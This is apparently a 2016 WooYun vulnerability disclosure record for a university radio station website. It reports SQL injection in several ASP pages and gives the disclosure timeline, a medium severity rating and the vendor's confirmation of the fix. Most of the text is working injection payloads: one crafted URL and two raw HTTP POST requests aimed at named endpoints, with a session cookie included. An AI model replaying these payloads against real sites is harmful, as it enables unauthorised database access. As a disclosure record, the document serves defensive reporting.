乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-02-26: 细节已通知厂商并且等待厂商处理中 2016-02-27: 厂商已经确认,细节仅向厂商公开 2016-03-03: 厂商已经修复漏洞并主动公开,细节向公众公开
http://lgradio.sdut.edu.cn/guangbotaizj/list.asp?bumen=-1' OR 1=1* or 'S0fGqVbf'='
POST /js/ipcount.asp HTTP/1.1Content-Length: 84Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://lgradio.sdut.edu.cnCookie: ASPSESSIONIDCQQBBSAT=JGLLFOBDDNJEKGGCPHGCAEMDHost: lgradio.sdut.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*Submit=%cc%e1%bd%bb&ip=211.64.23.114'%20AND%203*2*1%3d6%20AND%20'000cX2b'%3d'000cX2b
POST /xinwenfb/search.asp HTTP/1.1Content-Length: 105Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://lgradio.sdut.edu.cnCookie: ASPSESSIONIDCQQBBSAT=JGLLFOBDDNJEKGGCPHGCAEMDHost: lgradio.sdut.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*key=-1'%20OR%203*2*1%3d6%20AND%20000521%3d000521%20or%20'tT6bOkaq'%3d'&type=academy&yanzheng=%b2%e9%d1%af
跑第一处来证明:
危害等级:中
漏洞Rank:5
确认时间:2016-02-27 16:19
已确认,网站正在改版中,谢谢提交漏洞信息。
2016-03-03:已修复